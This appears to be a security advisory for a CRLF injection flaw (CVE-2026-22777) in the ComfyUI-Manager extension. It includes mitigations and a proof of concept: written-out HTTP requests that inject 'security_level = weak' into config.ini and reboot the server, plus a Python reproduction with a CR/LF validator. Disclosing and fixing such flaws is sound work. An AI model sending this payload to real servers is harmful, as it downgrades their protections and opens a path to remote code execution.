ComfyUI-Manager CRLF Injection in Configuration Handler – CVE-2026-22777

Vulnerable Version

Prior to versions 3.39.2 and 4.0.5

Fixed Version

versions 3.39.2 and 4.0.5

Base Score

7.5 High

Vendor Description:

ComfyUI-Manager is an extension designed to enhance the functionality and usability of the ComfyUI interface for AI image generation workflows. It provides tools for managing custom nodes, models, and updates directly from the web interface, simplifying maintenance and configuration tasks. The manager streamlines installation, version control, and dependency handling, making it easier for users to extend their AI pipelines. By centralizing resource management, it reduces manual configuration errors and improves operational efficiency. Overall, it serves as a convenience-focused management layer that improves workflow organization within the ComfyUI ecosystem.

CVE-2026-22777 Description:

A previously published vulnerability (CVE-2025-67303) revealed that configuration files were kept in an unprotected directory (user/default/ComfyUI-Manager/), allowing attackers to read and overwrite config.ini via the /userdata/ API. This let an attacker lower security settings (such as security_level) and ultimately achieve remote code execution (RCE).

To fix this issue, ComfyUI-Manager version 3.38 moved important configuration data to the protected __manager directory, which is inaccessible via the /userdata/ API.

However, the mitigation was not complete.

Prior to 3.39.2, including in the 4.0.0 to 4.0.4 release range, the write_config() function does not properly sanitize user-supplied input before writing it to the config.ini file. Specifically, it does not filter or neutralize carriage return (\r) and newline (\n) characters, leaving a CRLF injection vulnerability.

An attacker might exploit this weakness by introducing malicious CRLF sequences into HTTP query parameters of ComfyUI-Manager configuration endpoints (for example, /api/manager/db_mode). This enables the unrestricted insertion of additional configuration directives into config.ini.

Impact

  • Inject arbitrary key-value pairs into the configuration file
  • Modify security-sensitive parameters (e.g., downgrade security_level from normal to weak)
  • Bypass intended configuration protections introduced in previous patches
  • Recreate conditions similar to CVE-2025-67303
  • Potentially achieve remote code execution (RCE) through subsequent attack chains

Mitigations

  • Upgrade to ComfyUI-Manager version 3.39.2 or later, or 4.0.5 and above
  • Implement strict input validation and sanitization to strip or encode CRLF characters
  • Enforce server-side validation for configuration parameters
  • Restrict network exposure where possible (avoid using --listen unless necessary)

POC

First, confirm that the old CVE-2025-67303 vulnerability no longer works – attempting to read the configuration file via the /userdata/ API will produce a 404 response, as the configuration has been relocated to the protected __manager directory.

GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
Host: your-ip:8188

To get around the security restriction, submit a request to the /api/manager/db_mode endpoint with CRLF. The %0D in the payload is a URL-encoded carriage return character (\r), which enables Python’s configparser to regard everything after it as a new configuration entry, inserting security_level = weak into the configuration file.

GET /api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak HTTP/1.1
Host: your-ip:8188

After the injection, restart the ComfyUI server by sending a request to /api/manager/reboot to apply the updated settings.
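As an added illustration (not ComfyUI-Manager's own code), the following Python reproduces the mechanism behind the PoC above and the sanitization called for in the mitigations: a configuration value carrying a raw carriage return is written with configparser and re-read, showing the injected directive taking effect, next to a validator that rejects CR/LF before the write. The section and key names, the payload and the validate_config_value helper are constructed for this example.

```python
# Added example (not ComfyUI-Manager's own code): reproduces the CRLF
# mechanism from the write-up with configparser and shows the fix.
import configparser
import os
import tempfile


def validate_config_value(value: str) -> str:
    """Reject any value carrying CR or LF; either can end a line in an INI file."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF characters are not allowed in configuration values")
    return value


def write_config(path: str, db_mode: str, sanitize) -> None:
    """Write a minimal config.ini; `sanitize` is applied to the user-supplied value."""
    cfg = configparser.ConfigParser()
    cfg["default"] = {"db_mode": sanitize(db_mode)}  # section/key names are constructed
    with open(path, "w", encoding="utf-8") as fh:
        cfg.write(fh)  # a lone \r inside a value is emitted unchanged


def read_security_level(path: str) -> str:
    """Re-read the file as the application would; text mode treats a lone \\r as a line end."""
    cfg = configparser.ConfigParser()
    cfg.read(path, encoding="utf-8")
    return cfg.get("default", "security_level", fallback="normal")


def demo() -> tuple[str, str]:
    # Constructed payload mirroring the %0D request on this page: value + CR + new directive.
    payload = "cache\rsecurity_level = weak"
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "config.ini")
        write_config(path, payload, sanitize=lambda v: v)  # vulnerable: no filtering
        injected_level = read_security_level(path)         # "weak": a new key appeared
        try:
            write_config(path, payload, sanitize=validate_config_value)  # hardened path
            outcome = "written"
        except ValueError:
            outcome = "rejected"
    return injected_level, outcome


if __name__ == "__main__":
    print(demo())  # ('weak', 'rejected')
```

The unsanitized write lets the re-read configuration pick up security_level = weak even though the writer only intended to set db_mode; the validating write refuses the value outright.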
